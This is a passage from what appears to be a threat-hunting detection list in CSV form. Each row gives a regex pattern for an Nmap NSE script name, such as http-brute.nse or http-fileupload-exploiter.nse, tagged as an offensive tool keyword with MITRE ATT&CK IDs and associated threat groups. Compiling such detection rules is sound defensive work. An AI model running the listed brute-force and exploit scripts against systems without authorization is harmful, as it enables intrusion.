Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1449" "* http-apache-server-status.nse*",".{0,1000}\shttp\-apache\-server\-status\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1450" "* http-aspnet-debug.nse*",".{0,1000}\shttp\-aspnet\-debug\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1451" "* http-auth.nse*",".{0,1000}\shttp\-auth\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1452" "* http-auth-finder.nse*",".{0,1000}\shttp\-auth\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1453" "* http-avaya-ipoffice-users.nse*",".{0,1000}\shttp\-avaya\-ipoffice\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1454" "* http-awstatstotals-exec.nse*",".{0,1000}\shttp\-awstatstotals\-exec\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1455" "* http-axis2-dir-traversal.nse*",".{0,1000}\shttp\-axis2\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1456" "* http-backup-finder.nse*",".{0,1000}\shttp\-backup\-finder\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1457" "* http-barracuda-dir-traversal.nse*",".{0,1000}\shttp\-barracuda\-dir\-traversal\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1458" "* http-bigip-cookie.nse*",".{0,1000}\shttp\-bigip\-cookie\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1459" "* http-brute.nse*",".{0,1000}\shttp\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1460" "* http-cakephp-version.nse*",".{0,1000}\shttp\-cakephp\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1461" "* http-chrono.nse*",".{0,1000}\shttp\-chrono\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1462" "* http-cisco-anyconnect.nse*",".{0,1000}\shttp\-cisco\-anyconnect\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1463" "* http-coldfusion-subzero.nse*",".{0,1000}\shttp\-coldfusion\-subzero\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1464" "* http-comments-displayer.nse*",".{0,1000}\shttp\-comments\-displayer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1465" "* http-config-backup.nse*",".{0,1000}\shttp\-config\-backup\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1466" "* http-cookie-flags.nse*",".{0,1000}\shttp\-cookie\-flags\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1467" "* http-cors.nse*",".{0,1000}\shttp\-cors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1468" "* http-cross-domain-policy.nse*",".{0,1000}\shttp\-cross\-domain\-policy\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1469" "* http-csrf.nse*",".{0,1000}\shttp\-csrf\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1470" "* http-date.nse*",".{0,1000}\shttp\-date\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1471" "* http-default-accounts.nse*",".{0,1000}\shttp\-default\-accounts\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1472" "* http-devframework.nse*",".{0,1000}\shttp\-devframework\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1473" "* http-dlink-backdoor.nse*",".{0,1000}\shttp\-dlink\-backdoor\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1474" "* http-dombased-xss.nse*",".{0,1000}\shttp\-dombased\-xss\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1475" "* http-domino-enum-passwords.nse*",".{0,1000}\shttp\-domino\-enum\-passwords\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1476" "* http-drupal-enum.nse*",".{0,1000}\shttp\-drupal\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1477" "* http-drupal-enum-users.nse*",".{0,1000}\shttp\-drupal\-enum\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1478" "* http-enum.nse*",".{0,1000}\shttp\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1479" "* http-errors.nse*",".{0,1000}\shttp\-errors\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1480" "* http-exif-spider.nse*",".{0,1000}\shttp\-exif\-spider\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1481" "* http-favicon.nse*",".{0,1000}\shttp\-favicon\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1482" "* http-feed.nse*",".{0,1000}\shttp\-feed\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1483" "* http-fetch.nse*",".{0,1000}\shttp\-fetch\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1484" "* http-fileupload-exploiter.nse*",".{0,1000}\shttp\-fileupload\-exploiter\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1485" "* http-form-brute.nse*",".{0,1000}\shttp\-form\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1486" "* http-form-fuzzer.nse*",".{0,1000}\shttp\-form\-fuzzer\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1487" "* http-frontpage-login.nse*",".{0,1000}\shttp\-frontpage\-login\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1488" "* http-generator.nse*",".{0,1000}\shttp\-generator\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1489" "* http-git.nse*",".{0,1000}\shttp\-git\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1490" "* http-gitweb-projects-enum.nse*",".{0,1000}\shttp\-gitweb\-projects\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1491" "* http-google-malware.nse*",".{0,1000}\shttp\-google\-malware\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1492" "* http-grep.nse*",".{0,1000}\shttp\-grep\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1493" "* http-headers.nse*",".{0,1000}\shttp\-headers\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1494" "* http-hp-ilo-info.nse*",".{0,1000}\shttp\-hp\-ilo\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1495" "* http-huawei-hg5xx-vuln.nse*",".{0,1000}\shttp\-huawei\-hg5xx\-vuln\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0007 - TA0043","N/A","Qilin - Cactus - EMBER BEAR - ENERGETIC BEAR - MUSTANG PANDA - TA2101 - FIN13 - Black Basta","Vulnerability Scanner","https://svn.nmap.org/nmap/scripts/","1","0","N/A","N/A","N/A","N/A","N/A","N/A","N/A","N/A","1496" "* http-icloud-findmyiphone.nse*",".{0,1000}\shttp\-icloud\-findmyiphone\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
